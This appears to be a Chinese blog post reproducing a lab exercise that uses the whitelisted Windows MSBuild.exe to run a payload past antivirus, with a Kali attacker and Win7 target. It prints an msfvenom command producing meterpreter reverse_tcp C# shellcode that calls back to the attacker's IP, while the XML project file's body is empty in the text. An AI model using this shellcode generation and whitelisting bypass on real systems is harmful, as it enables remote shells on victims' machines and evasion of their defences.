对亮神基于白名单 Msbuild.exe 执行 payload 第一季复现

0x00 MSBuild简介:

MSBuild是 Microsoft Build Engine 的缩写,代表 Microsoft 和 Visual Studio 的新的生成平台。MSBuild 在如何处理和生成软件方面是完全透明的,使开发人员能够在未安装Visual Studio 的生成实验室环境中组织和生成产品。MSBuild 引入了一种新的基于 XML 的项目文件格式,这种格式容易理解、易于扩展并且完全受 Microsoft 支持。MSBuild 项目文件的格式使开发人员能够充分描述哪些项需要生成,以及如何利用不同的平台和配置生成这些项

0x01 环境

攻击机kali 192.168.5.99
靶机win7 192.168.5.112
靶机装有数字AV

0x02复现

攻击机配置监听
对亮神基于白名单 Msbuild.exe 执行 payload 第一季复现_第1张图片
靶机运行
对亮神基于白名单 Msbuild.exe 执行 payload 第一季复现_第2张图片
shell弹回
在这里插入图片描述

0x03 jiu.xml


         
         
         
         
         
    
      
    
    
      
      
        
        
        
      
    
  

其中payload为C# shellcode

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.99 LPORT=10129 -f csharp

0x04总结

用亮神的payload笔者报错,无法解决,故采用其他人的payload,主要是msbuild.exe执行,能过av,但目标须装有.net4.0

0x05借鉴

https://github.com/Micropoor/Micro8/blob/master/第七十一课:基于白名单Msbuild.exe执行payload第一季.pdf
http://www.secist.com/archives/6082.html
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/

你可能感兴趣的:(亮神文章复现)